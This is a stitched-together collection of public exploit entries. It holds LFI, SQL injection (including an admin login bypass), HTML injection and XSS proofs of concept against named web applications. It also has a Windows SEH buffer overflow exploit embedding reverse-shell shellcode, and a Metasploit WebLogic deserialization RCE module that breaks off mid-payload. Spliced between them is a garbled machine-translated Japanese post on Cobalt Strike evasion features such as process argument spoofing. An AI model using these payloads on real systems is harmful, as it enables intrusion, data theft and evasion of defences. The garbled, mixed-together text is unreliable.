# Exploit Title: Wordpress Anti-Malware Security and Bruteforce Firewall - Local File Inclusion
# Google Dork: N/A
# Date: 03 / 26 / 2019
# Exploit Author: Ali S. Ahmad (S4R1N)
# Vendor Homepage: N/A
# Software Link: https://wordpress.org/plugins/gotmls/
# Version: (Version 4.18.63)
# Tested on: Debian GNU/Linux 9 (Docker)
# CVE : N/A
***********************************************************************
Discovered By: Ali S. Ahmad (S4R1N) 03 / 26 / 2019
***********************************************************************
A local file inclusion bug was discovered on the Wordpress Anti-Malware Security and Bruteforce Firewall (Version 4.18.63) plugin.
This bug affects the file scan functionality of the plugin and can be exploited by any authenticated user (from subscriber to admin) simply by modifying the GOTMLS_scan= with a base64 encoded path to the file the attacker is trying to read. (example : GOTMLS_scan=L2V0Yy9wYXNzd2Q)
***********************************************************************
Tools used :
Attacker OS : Fedora 29
Victim OS : Debian GNU/Linux 9 (running on docker)
Manual Testing tool : Burp Repeater / Browser
***********************************************************************
Proof of Concept (PoC):
Step 1 - Log into Wordpress instance
Step 2 - Go to /wp-admin/admin-ajax.php?action=GOTMLS_scan&GOTMLS_mt=32fd564ad6974510e6bcd22815853f3d&mt=1553627072.7669&page=GOTMLS-settings&GOTMLS_scan=<base64 encoded file path>
URL : the following should yeild the contents of /etc/passwd /wp-admin/admin-ajax.php?action=GOTMLS_scan&GOTMLS_mt=32fd564ad6974510e6bcd22815853f3d&mt=1553627072.7669&page=GOTMLS-settings&GOTMLS_scan=L2V0Yy9wYXNzd2Q
# Exploit Title: Wordpress Loco Translate (Version 2.2.1) Plugin LFI
# Google Dork: N/A
# Date: 03 / 26 / 2019
# Exploit Author: Ali S. Ahmad (S4R1N)
# Vendor Homepage: https://localise.biz/
# Software Link: https://wordpress.org/plugins/loco-translate/
# Version: (Version 2.2.1)
# Tested on: Debian GNU/Linux 9 (Docker)
# CVE : N/A
***********************************************************************
Discovered By: Ali S. Ahmad (S4R1N) 03 / 26 / 2019
***********************************************************************
A local file inclusion bug was discovered on the Wordpress Loco Translate (Version 2.2.1) Plugin.
This bug can be exploited by any user who has acces to the plugin with the access levels ranging from subscriber to admin. Exploitation of the bug abuses the template editing fucntionality of the plugin and the file-view action, this allows a user to access any system file and view its contents.
Exploitation can be done via two main methods, either using (..%2F..%2F..%2F..%2Fetc%2Fpasswd) or directly calling the file via file path (/etc/passwd).
***********************************************************************
Tools used :
Attacker OS : Fedora 29
Victim OS : Debian GNU/Linux 9 (running on docker)
Manual Testing tool : Burp Repeater / Browser
***********************************************************************
Proof of Concept (PoC):
Step 1 - Log into Wordpress instance
Step 2 - Make sure the given user has access to the plugin (can be confirmed on by checking the side panel for the Loco Translate Plugin)
Step 3 - Select the theme you would like
Step 4 - Click edit template
Step 5 - Click Source (to view file source code)
Step 6 - In the url bar change path to the file you want to read (something like /etc/passwd), file path will then be visible.
URL : the following should yeild the contents of /etc/passwd /wp-admin/admin.php?path=%2Fetc%2Fpasswd&bundle=twentynineteen&domain=twentynineteen&page=loco-theme&action=file-view
# Exploit Title: Fat Free CRM v0.19.0 - HTML Injection
# Date: 2019-03-20
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: http://www.fatfreecrm.com/
# Source Code : https://github.com/fatfreecrm
# Software : Fat Free CRM
# Product Version: v0.19.0
# Vulnerability Type : Code Injection
# Vulnerability : HTML Injection
# CVE : CVE-2019-10226
POST /comments HTTP/1.1
Host: XXXXXXXXXXXX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: */*;q=0.5, text/javascript, application/javascript, application/ecmascript, application/x-ecmascript
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: XXXXXXXXXXXX
X-CSRF-Token: xikVMkG4Le6llfW44C7CQZsD3Qz7bDgbMCbPFCtMjbzJFTfTF5SOx6xPhFDB6EL8MFNSNspHI51gZqz4V7QNMQ==
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 162
DNT: 1
Connection: close
Cookie: _fat_free_crm_session=b25NTU15QnR0ZGQvOFZiNXptdE81VXNDQUZ1TjYxUi9ucHhPSmxDb2lHS2gzZGhGY0V3Um5pT2NOWVZVZmd0T0pnUjI2UjNGeTJyOEt6ajBpMGRxcHJtT2ZyRnJkL0N3R1VrQlJCMXU1TGg5TkZEaHVubW5nM3duZzROQ0xrekRHWjBNWGpaQjF2TVgyaDR6QXUwS1lGdVEyQk5xN2dqVVVkYlhaV0JTY05DcncrdHNSZWp6dWRWSkQ2V2ZKb1NQRFAwMVhXZFZkQjBFOTJOSUZoQWc5S3J0SnIvS1hNNWVtTGtnd1EwRWJRVS9aWkpUZVhHWUJXQm5EYURLNG1jSEUrRVM5WFZFd05RSjR3ZEViQnViamZvY0RNRXMzZzJyUTZCL2E3YjhEVFVBRmFQOXhyaDd3Vnh5alRSTGlnYjlKUTVPT2laYzNRRjJIWWRLdGthQklrWFZDdFdrbElsWWlRcTBoQm1OZnRpVGRoVmp1ckhIZkxlVUt1c3M0MWQ2d3k1Uk4rd2dnVFAveDlrcHJza2tCd3BQUEduTENMeUxxOUpQN0tKL2RoU29FNHN6YWlrWndDNHcvRHlSUjd5TUFJVVErUm5tVnhLVVhtRE81cnltcnMvaHFuOXdPclR1NGl1OHVnbFZmdi9iaTJTWndjQzdKTThOc0dtMVp1a3VlQk5IQm04QmZuMVl3OHlOSHdJemllcU50UHZCSElGNTVOK0lCY2VSUHBIT20zcFNsay9PN0c1dWVkTHEzVnQxMUUvaXJRNHNoV2ZXNDNWeHpIbDdaUEJvaTBmaG1Xek0zRk5OZDdwTUZjUk4xaUl2N0hCMysvTFNHN2FNOTRhVGY5QU9Jc2VialV5Z1ovQS9ZUW5LUXRzL2lZQjNyTGVlTWY1QnFuczk1L3cvL25tNXlsTDlOcm5XdEpUYlNZNUhSSDNLZEJDRFZNUWVjcHQ1SjJCT3ArOW9nZDMwTGp1UWhqTm1lUE8wcGNHVVhDaG9adnNJdVZmUTVabDNUQ0JGSXEwdjNxK2xsdjF4Uk1TekVVZmoxM3JLajI5dis2VTlGRW4xVHZBNGY4Z3ZVemRZL1VZTy9ET01Ja3lzUkg1MzNQNUtWNUp2bi92QWVMTU1weUJ4NHV6Q0VjTmpvUlo1bVk4dzUzWDAxRWV5cVpBUkRBU1dveDFkQkdQMTJHMTAtLVl6endaUmJ2SStHeHZmZVUya1JKd0E9PQ%3D%3D--5584247e850cfdc0a8c912a9cc5ffaa1ce34b969
utf8=%E2%9C%93&comment%5Bcommentable_id%5D=143&comment%5Bcommentable_type%5D=Contact&comment%5Bcomment%5D=%22%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E&commit=Add+Note
# Exploit Title: Homey BNB (Airbnb Clone Script) - Multiple SQL Injection
# Date: 27.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.doditsolutions.com/airbnb-clone-script/
# Demo Site: http://sitedemos.in/homeybnb/
# Version: V4
# Tested on: Kali Linux
# CVE: N/A
----- PoC 1: SQLi -----
Request: http://localhost/[PATH]/rooms/ajax_refresh_subtotal
Vulnerable Parameter: hosting_id (GET)
Payload: checkin=mm/dd/yy&checkout=mm/dd/yy&hosting_id=1' AND SLEEP(5)--
DXVl&number_of_guests=1
----- PoC 2: SQLi -----
Request: http://localhost/[PATH]/admin/edit.php?id=1
Vulnerable Parameter: id (GET)
Payload: id=if(now()=sysdate()%2Csleep(0)%2C0)
----- PoC 3: SQLi -----
Request: http://localhost/[PATH]/admin/cms_getpagetitle.php?catid=1
Vulnerable Parameter: catid (GET)
Payload: catid=-1'%20OR%203*2*1=6%20AND%20000640=000640%20--%20
----- PoC 4: SQLi -----
Request: http://localhost/[PATH]/admin/getcmsdata.php?pt=1
Vulnerable Parameter: pt (GET)
Payload: pt=-1'%20OR%203*2*1=6%20AND%20000929=000929%20--%20
----- PoC 5: SQLi -----
Request: http://localhost/[PATH]/admin/getrecord.php?val=1
Vulnerable Parameter: val (GET)
Payload: val=-1'%20OR%203*2*1=6%20AND%20000886=000886%20--%20
----- PoC 6: SQLi (Authentication Bypass -----
Administration Panel: http://localhost/[PATH]/admin/
Username: '=' 'or'
Password: '=' 'or'
# Exploit Title: i-doit 1.12 Cross Site Scripting on qr.php file
# Date: 28-03-2019
# Software Link: https://www.i-doit.org/
# Version: 1.12
# Exploit Author: BlackFog Team
# Contact: info@securelayer7.net
# Website: https://securelayer7.net
# Category: webapps
# Tested on: Firefox in Kali Linux.
# CVE: CVE-2019-6965
Vendor Description
==================
i-doit offers you a professional IT-documentation solution based on ITIL
guidelines. You can document IT systems and their changes, define emergency
plans, display vital information and ensure a stable and efficient
operation of IT networks.
Attack Type
==================
Reflected Cross Site Scripting on qr.php file in URL perameter reported By
Touhid M.Shaikh(@touhidshaikh22).
Proof of Concept
==================
https://IP_ADDRESS/src/tools/php/qr/qr.php?url=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
Vulnerable Code.
==================
---------------------------------- qr.php Source Code
-----------------------------
..................................... SNIP
........................................
$l_url = @$_GET['url']; <--- Vulnerable
Perameter
..................................... SNIP
........................................
<img id="code" src="<?php echo $l_url; ?>images/ajax-loading.gif"
alt="Error loading the QR Code" /> <--- Display Here without any
validation.
------------------------------qr.php Source Code ends
---------------------------
Fixed
======
Update to latest
Timeline
========
10 Jan, 2018 === Update to Customer
11 Jan, 2018 === Got Mail to Trigger the issue and we are able to repoduce
the same.
15 Jan, 2018 === Provided Hotfix.
17 Jan, 2018 === Got Thanks for responsible disclosure and agree to publish
on public.
#!/usr/bin/env python
# Exploit Title: Base64 Decoder 1.1.2 Local Buffer Overflow (SEH) + Egghunter
# Date: 28.03.2019
# Exploit Author: Paolo Perego - paolo@armoredcode.com
# Vendor Homepage: http://4mhz.de/b64dec.html
# Software Link: http://4mhz.de/download.php?file=b64dec-1-1-2.zip
# Version: Base64 Decoder 1.1.2
# Tested on: Windows 7 Professional SP1 x86
# Notes: this exploit implements the PoC described here: https://www.exploit-db.com/exploits/39070
junk="A" * 4
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.106 LPORT=4444 -f py -b '\x00\x0a'
buf = "w00tw00t"
buf += "\xbd\x82\x38\x76\xea\xd9\xcd\xd9\x74\x24\xf4\x58\x2b"
buf += "\xc9\xb1\x52\x83\xe8\xfc\x31\x68\x0e\x03\xea\x36\x94"
buf += "\x1f\x16\xae\xda\xe0\xe6\x2f\xbb\x69\x03\x1e\xfb\x0e"
buf += "\x40\x31\xcb\x45\x04\xbe\xa0\x08\xbc\x35\xc4\x84\xb3"
buf += "\xfe\x63\xf3\xfa\xff\xd8\xc7\x9d\x83\x22\x14\x7d\xbd"
buf += "\xec\x69\x7c\xfa\x11\x83\x2c\x53\x5d\x36\xc0\xd0\x2b"
buf += "\x8b\x6b\xaa\xba\x8b\x88\x7b\xbc\xba\x1f\xf7\xe7\x1c"
buf += "\x9e\xd4\x93\x14\xb8\x39\x99\xef\x33\x89\x55\xee\x95"
buf += "\xc3\x96\x5d\xd8\xeb\x64\x9f\x1d\xcb\x96\xea\x57\x2f"
buf += "\x2a\xed\xac\x4d\xf0\x78\x36\xf5\x73\xda\x92\x07\x57"
buf += "\xbd\x51\x0b\x1c\xc9\x3d\x08\xa3\x1e\x36\x34\x28\xa1"
buf += "\x98\xbc\x6a\x86\x3c\xe4\x29\xa7\x65\x40\x9f\xd8\x75"
buf += "\x2b\x40\x7d\xfe\xc6\x95\x0c\x5d\x8f\x5a\x3d\x5d\x4f"
buf += "\xf5\x36\x2e\x7d\x5a\xed\xb8\xcd\x13\x2b\x3f\x31\x0e"
buf += "\x8b\xaf\xcc\xb1\xec\xe6\x0a\xe5\xbc\x90\xbb\x86\x56"
buf += "\x60\x43\x53\xf8\x30\xeb\x0c\xb9\xe0\x4b\xfd\x51\xea"
buf += "\x43\x22\x41\x15\x8e\x4b\xe8\xec\x59\xb4\x45\xd6\xf3"
buf += "\x5c\x94\x26\x15\xc1\x11\xc0\x7f\xe9\x77\x5b\xe8\x90"
buf += "\xdd\x17\x89\x5d\xc8\x52\x89\xd6\xff\xa3\x44\x1f\x75"
buf += "\xb7\x31\xef\xc0\xe5\x94\xf0\xfe\x81\x7b\x62\x65\x51"
buf += "\xf5\x9f\x32\x06\x52\x51\x4b\xc2\x4e\xc8\xe5\xf0\x92"
buf += "\x8c\xce\xb0\x48\x6d\xd0\x39\x1c\xc9\xf6\x29\xd8\xd2"
buf += "\xb2\x1d\xb4\x84\x6c\xcb\x72\x7f\xdf\xa5\x2c\x2c\x89"
buf += "\x21\xa8\x1e\x0a\x37\xb5\x4a\xfc\xd7\x04\x23\xb9\xe8"
buf += "\xa9\xa3\x4d\x91\xd7\x53\xb1\x48\x5c\x63\xf8\xd0\xf5"
buf += "\xec\xa5\x81\x47\x71\x56\x7c\x8b\x8c\xd5\x74\x74\x6b"
buf += "\xc5\xfd\x71\x37\x41\xee\x0b\x28\x24\x10\xbf\x49\x6d"
junk += buf
print "filling with " + str(490-len(junk))
junk += "A" * (490 -len(junk))
junk+="\x90\x90\x90\x90"
junk+="\x90\x90\x90\x90"
# msf-egghunter -f raw -e w00t -a x86 -p windows | msfvenom -a x86 --platform windows -f py -b '\x00' -v egg
egg = ""
egg += "\xb8\x2e\x04\x6d\x70\xdb\xd5\xd9\x74\x24\xf4\x5a\x2b"
egg += "\xc9\xb1\x09\x31\x42\x12\x83\xea\xfc\x03\x6c\x0a\x8f"
egg += "\x85\x16\x93\x85\x99\xd9\xd1\x4b\x0c\xe7\x8d\xa6\xfe"
egg += "\xdb\x28\x63\x8b\xcc\x8b\xe4\x43\x22\x98\x83\x73\xed"
egg += "\x15\x7e\xd4\x84\x32\x81\xcc"
junk += egg
junk += "A"*(620-len(junk))
junk+="\xeb\x80\x90\x90"
# POP-POP-RET is on 0x00401414
junk+="\x14\x14\x40"
f=open("crash.txt", "w")
f.write(junk)
f.close
===========================================================================================
# Exploit Title: BigTree CMS - 'parent' SQL Inj.
# Dork: N/A
# Date: 24-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.bigtreecms.org/
# Software Link: https://www.bigtreecms.org/download/core/
# Version: v4.3.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: We strongly believe your content managements system
shouldn't require
you to compromise your vision. BigTree is an extremely extensible open
source CMS built on PHP and MySQL.
It was created by the expert designers, strategists, and developers at
Fastspot to help you make and maintain better websites.
===========================================================================================
# POC - SQLi
# Parameters : parent
# Attack Pattern :
-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27
# POST Method :
http://localhost/BigTree-CMS/site/index.php/admin/pages/create/
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: BigTree CMS - 'page' SQL Inj.
# Dork: N/A
# Date: 24-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.bigtreecms.org/
# Software Link: https://www.bigtreecms.org/download/core/
# Version: v4.3.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: We strongly believe your content managements system
shouldn't require
you to compromise your vision. BigTree is an extremely extensible open
source CMS built on PHP and MySQL.
It was created by the expert designers, strategists, and developers at
Fastspot to help you make and maintain better websites.
===========================================================================================
# POC - SQLi
# Parameters : page
# Attack Pattern : %2527
# GET Method :
http://localhost/BigTree-CMS/site/index.php/admin/ajax/tags/get-page/?page=[SQL
Inject Here]&sort=
===========================================================================================
# Exploit Title: Jettweb PHP Hazır Rent A Car Sitesi Scripti V2 - 'arac_kategori_id' SQL Injection
# Date: 28.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://jettweb.net/u-4-php-hazir-rent-a-car-sitesi-scripti-v2.html
# Demo Site: http://rentv2.proemlaksitesi.net/
# Version: V2
# Tested on: Kali Linux
# CVE: N/A
----- PoC: SQLi -----
Request: http://localhost/[PATH]/fiyat-goster.html
Vulnerable Parameter: arac_kategori_id (POST)
Payload: arac_kategori_id=-1' OR 3*2*1=6 AND 000224=000224 --
# -⋆- coding: utf-8 -⋆-
Created on Thu Feb 21 01:32:50 2019
@author: César
"""
#Exploit Title: Microsoft Visio 2016 (16.0.4738.1000) "Log in accounts" allows go on whit email formed by one thousand A in every of its parts AAA---A@AAA--A.AAA---A
#Descovered by: César Adrián Coronado Llanos
#Descovered Date; Sun Feb 17 20:34:23 2019
#Vendor Homepage: https://www.microsoft.com
#Tested Version: 16.0.4738.1000 x64
#Tested on OS: Microsoft Windows 10 Home Single Language x64
#Versión 10.0.10240 compilación 10240
#Steps to produce the crash
#1.- Run c code: generator.c
#2.- Open the file created "letters.txt" and copy the text content to clipboard
#3.- Open Visio 2016
#4.- Click in change account or Login
#5.- In the Login paste the clipboard, typewrite @ paste again the clipboard, typewrite . and paste for last time the clipboard, clik in next
#6.- Click in professional account
#7.- Visio 2016 don't respond, however it stays in a white window and don't send us any message
Note: For do this you need internet conection.
#include<stdio.h>
int main(){
int i;
FILE *letters;
if((letters = fopen("letters.txt","w+")) != NULL){
for(i=0;i<999;i++){
fprintf(letters,"A");
}
}
fclose(letters);
printf("\tThe file was created successfully!!\n");
}
Note: This code was compiled in dev C++
===========================================================================================
# Exploit Title: NewJobPortal v3.1 - 'job_submit' SQL Inj.
# Dork: N/A
# Date: 25-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://codecanyon.net/item/job-portal/15330095
# Version: v3.1
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Job portal is developed for creating an interactive
job vacancy for candidates.
This web application is to be conceived in its current form as a dynamic
site-requiring constant
updates both from the seekers as well as the companies.
===========================================================================================
# POC - SQLi
# Parameters : job_submit
# Attack Pattern : convert(int%2c+cast(0x454d49524f474c55+as+varchar(8000)))
# POST Method : http://localhost/newjobportal/job_search/search
===========================================================================================
コバルトストライク3.13が利用可能になりました。このリリースは、TCPビーコン、プロセスパラメータースプーフィングを追加し、SMBおよびTCPビーコンに難読化と睡眠機能を拡張します。
TCPビーコン
コバルトストライクは、長い間、パイプという名前のバイパスできました。 Cobalt Strike 3.13はTCPビーコンを使用して、このポイントツーポイントピボットモデルを拡張します。これで、バインディングTCPBeaconを許可の高さと水平方向の動きのターゲットとして使用できます。 SMBBeaconと同様に、TCPBeaconから切断して、後で別のビーコン(同じコバルトストライクインスタンス)から再接続できます。
Cobalt Strike 3.13のPivotリスナーは、Stagelessの逆TCPBeaconリスナーになりました。ピボットリスナーをビーコンセッションからバインドし、それに接続された雄弁なTCPビーコンアーティファクトをエクスポートできます。
コバルトストライクのSSHセッションは、TCPビーコンセッションも制御できます!はい、SSHを介してDataPivotホストに接続し、ビーコングリッドの制御を復元するために使用できます。
リバースTCPBeaconのピボットリスナーは、SSHセッションで実行することもできますが、1つ注意してください。SSHデーモンは通常、ローカルホストへの逆ポート転送のみを制限します。 SSH構成のGatewayPortsオプションを使用して、この設定を変更できます。これは、 *nixラットとしてdropbearを使用している人にとっては良い追加ピボットオプションです
プロセスパラメータースプーフィング
Red Team Proの場合、2018年のスピーカーの1つはEDR Age RedチームのBurgessです。このスピーチでは、EDRの回避のためのいくつかのヒントについて説明します。これには、親プロセスの不正行為、不正行為、隠された記憶のプロセスパラメーターなどがあります。ウィルの講演の後、セッションの準備オプションとしてコバルトストライクにプロセスパラメータースプーフィングを追加する方法を選択しました。私が考えているのは:
ビーコンのArguコマンドを使用すると、コマンドと一連の擬似アングメントを内部リストに追加できます。ビーコンがコマンドの1つを開始すると[正確に一致する必要があります]、懸濁状態の擬似パラメーターで開始します。次に、ビーコンは実際のパラメーターを使用してプロセスメモリを更新し、実行を再開します。新しいプロセス作成イベントを購読するツールには、古いパラメーターが表示されます。子プロセスは、スプーフィングされたパラメーターで実行されます。この手法は、悪意のあるプロセスパラメーターを見つけるために後退する方法です。
いつものように、これはRedチームにとって100%機能する新しいテクノロジーではありません。この手法は、リモートプロセスのメモリの読み取りと書き込みに依存しています。これは悪い指標です。
私が実装したように、この手法はx86 -x86およびx64 -x64を実行できます。さらに、この手法では、擬似パラメータが実際のパラメーターと同じくらい長いかそれ以上であることが必要です。最後に、プロセスPEBを読み取ってプロセスパラメーターを決定するプログラムは、擬似パラメーターではなく、実際のパラメーターを表示します。
それでも、この手法は、ターゲットでプロセスを実行してタスクを完了する必要がある場合に、アクションをマスクする別の方法です。
プロセスの欺ceptionデモンストレーション:
このビデオでは、コバルトストライク3.13のプロセスパラメータースプーフィングを示しています。このテクノロジーは、Will BurgessがWild West Hackin’Fest 2018のEDR Age Talk of Edr Age Talkで前進しているという考えに基づいています。
メモリの難読化
メモリで自分自身を混乱させることができるペイロードがあるのはクールだといつも思っていました。これは、静的文字列を見つけることのポイントインタイム分析に押し戻すのに最適な方法です。 Cobalt Strike 3.12は、HTTP/HTTPSおよびDNSビーコンペイロードのこの機能を導入します。
Cobalt Strike 3.13は、この機能をSMBおよびTCPビーコンに拡張します。今、これらのビーコンは、新しい接続を待っている間、自分自身を混乱させます。彼らはまた、親のビーコンから情報を読むのを待つとき、自分自身を混乱させます。実際、これらのビーコンは混乱するのに多くの時間がかかります。
この動作を有効にするには、stage -sleep_maskオプションをmalleablec2構成ファイルでtrueに設定します。最もクリーンなメモリエクスペリエンスのために、ステージ-Cleanupを真、主に雄弁なペイロードを使用することをお勧めします
難読化および睡眠デモ:
難読化と睡眠は、コバルトストライク3.12で導入された順応性のあるC2オプションです。有効になった場合、ビーコンは睡眠状態に入る前にメモリで自分自身を混同します。それが実行されると、それ自体を混乱させます。
トークンマジック
Execute-Assembly、Net、Portscan、PowerPickコマンドを実行して、現在のトークンを使用します。このバージョンは、make_tokenコマンドも更新します。現在、Beaconに提供する資格情報を保存しています。ビーコンが新しく作成されたトークンで新しいプロセスを実行する許可を持たない場合、これらの資格情報を使用して、createprocesswithlogonwに戻ります。これにより、メイクトークンは、非公開から主に有用になります。
リリースノートをチェックして、コバルトストライク3.13の新機能の完全なリストをご覧ください。認定ユーザーは、更新プログラムを使用して最新情報を取得できます。 21日間のコバルトストライクトライアルも利用できます。
wiz_tmp_tag id='wiz-table-range-border' contentedable='false' style='display: none;'
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/powershell'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
#include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Powershell
def initialize(info={})
super(update_info(info,
'Name' => 'Oracle Weblogic Server Deserialization RCE - Raw Object',
'Description' => %q{
An unauthenticated attacker with network access to the Oracle Weblogic Server T3
interface can send a serialized object (weblogic.jms.common.StreamMessageImpl)
to the interface to execute code on vulnerable hosts.
},
'Author' =>
[
'Andres Rodriguez', # Metasploit Module - 2Secure (@acamro, acamro[at]gmail.com)
'Stephen Breen', # Vulnerability Discovery
'Aaron Soto' # Reverse Engineering JSO and ysoserial blobs
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2015-4852']
],
'Privileged' => false,
'Platform' => %w{ unix win solaris },
'Targets' =>
[
[ 'Unix',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'},
'Payload' => {
'Encoder' => 'cmd/ifs',
'BadChars' => ' ',
'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'python'}
}
],
[ 'Windows',
'Platform' => 'win',
'Payload' => {},
'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}
],
[ 'Solaris',
'Platform' => 'solaris',
'Arch' => ARCH_CMD,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},
'Payload' => {
'Space' => 2048,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 28 2015'))
register_options([Opt::RPORT(7001)])
end
=begin This check is currently incompatible with the Tcp mixin. :-(
def check
resp = send_request_cgi(
'method' => 'GET',
'uri' => '/console/login/LoginForm.jsp'
)
return CheckCode::Unknown unless resp && resp.code == 200
unless resp.body.include?('Oracle WebLogic Server Administration Console')
vprint_warning("Oracle WebLogic Server banner cannot be found")
return CheckCode::Unknown
end
/WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.\d*)/ =~ resp.body
unless version
vprint_warning("Oracle WebLogic Server version cannot be found")
return CheckCode::Unknown
end
version = Gem::Version.new(version)
vprint_good("Detected Oracle WebLogic Server Version: #{version}")
case
when version.to_s.start_with?('10.3')
return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0')
when version.to_s.start_with?('12.1.2')
return CheckCode::Appears unless version > Gem::Version.new('12.1.2.0')
when version.to_s.start_with?('12.1.3')
return CheckCode::Appears unless version > Gem::Version.new('12.1.3.0')
when version.to_s.start_with?('12.2')
return CheckCode::Appears unless version > Gem::Version.new('12.2.1.0')
end
return CheckCode::Safe
end
=end
def t3_handshake
# retrieved from network traffic
shake = "t3 12.2.1\n"
shake << "AS:255\n"
shake << "HL:19\n"
shake << "MS:10000000\n\n"
sock.put(shake)
sleep(1)
sock.get_once
end
def build_t3_request_object
# T3 request serialized data
# retrieved by watching network traffic
# This is a proprietary, undocumented protocol
# TODO: Cite a source for the dissection of in the following 14 lines:
data = '000005c3' # lenght of the packet
data << '01' # CMD_IDENTIFY_REQUEST
data << '65' # QOS
data << '01' # Flags:
# CONTEXT_JVMID_FLAG = 1 (has JVMIDs)
# CONTEXT_TX_FLAG = 2
# CONTEXT_TRACE_FLAG = 4
# CONTEXT_EXTENDED_FLAG = 8
# CONTEXT_EXTENDED_USER_FLAG = 16
data << 'ffffffff' # response id
data << 'ffffffff' # invocable id
data << '0000006a' # abbrev offset
data << '0000ea60' # reconnect timeout ??
data << '0000001900937b484a'
data << '56fa4a777666f581daa4f5b90e2aebfc607499'
data << 'b4027973720078720178720278700000000a00'
data << '00000300000000000000060070707070707000'
data << '00000a000000030000000000000006007006'
data << 'fe010000' # ----- separator -----
data << 'aced0005' # JSO v5 header
data << '73' # object header
data << '72001d' # className (29 bytes):
data << '7765626c6f6769632e726a766d2e436c617373' # weblogic.rjvm.ClassTableEntry
data << '5461626c65456e747279' # (continued)
data << '2f52658157f4f9ed' # serialVersionUID
data << '0c00007870' # remainder of object header
data << '72' # object header
data << '00247765626c6f6769632e636f6d6d6f6e2e696e74' # className (36 bytes): weblogic.common.internal.PackageInfo
data << '65726e616c2e5061636b616765496e666f' # (continued)
data << 'e6f723e7b8ae1ec9' # serialVersionUID
data << '02' # SC_SERIALIZABLE
data << '0008' # fieldCount = 8
data << '4900056d616a6f72' # 0: Int: major
data << '4900056d696e6f72' # 1: Int: minor
data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch
data << '49000b736572766963655061636b' # 3: Int: servicePack
data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch
data << '4c0009696d706c5469746c65' # 5: Obj: implTitle
data << '7400124c6a6176612f6c616e672f537472696e673b' # java/lang/String
data << '4c000a696d706c56656e646f72' # 6: Obj: implVendor
data << '71007e0003' # (Handle) 0x007e0003
data << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion
data << '71007e0003' # (Handle) 0x007e0003
data << '78707702000078' # block footers
data << 'fe010000' # ----- separator -----
data << 'aced0005' # JSO v5 header
data << '7372' # object header
data << '001d7765626c6f6769632e726a766d2e436c6173' # className (29 bytes): weblogic.rjvm.ClassTableEntry
data << '735461626c65456e747279' # (continued)
data << '2f52658157f4f9ed' # serialVersionUID
data << '0c' # EXTERNALIZABLE | BLOCKDATA
data << '00007870' # remainder of object header
data << '72' # object header
data << '00247765626c6f6769632e636f6d6d6f6e2e696' # className (36 bytes): weblogic.common.internal.VersionInfo
data << 'e7465726e616c2e56657273696f6e496e666f' # (continued)
data << '972245516452463e' # serialVersionUID
data << '02' # SC_SERIALIZABLE
data << '0003' # fieldCount = 3
data << '5b0008' # array header (8 bytes)
data << '7061636b61676573' # ARRAY NAME = 'packages'
data << '740027' # TC_STRING className1 (39 bytes)
data << '5b4c7765626c6f6769632f636f6d6d6f6e2f69' # weblogic/common/internal/PackageInfo
data << '6e7465726e616c2f5061636b616765496e666f' # (continued)
data << '3b' # (continued)
data << '4c000e' # object header (14 bytes)
data << '72656c6561736556657273696f6e' # releaseVersion
data << '740012' # TC_STRING (18 bytes)
data << '4c6a6176612f6c616e672f537472696e673b' # versionInfoAsBytes
data << '5b0012' # array header (18 bytes)
data << '76657273696f6e496e666f41734279746573' # ARRAY NAME = java/lang/String;
data << '740002' # TC_STRING (2 bytes)
data << '5b42' # 0x5b42 = [B
data << '78' # block footer
data << '720024' # class (36 bytes)
data << '7765626c6f6769632e636f6d6d6f6e2e696e' # weblogic.common.internal.PackageInfo
data << '7465726e616c2e5061636b616765496e666f' # (continued)
data << 'e6f723e7b8ae1ec9' # serialVersionUID
data << '02' # SC_SERIALIZABLE
data << '0008' # fieldCount = 8
data << '4900056d616a6f72' # 0: Int: major
data << '4900056d696e6f72' # 1: Int: minor
data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch
data << '49000b736572766963655061636b' # 3: Int: servicePack
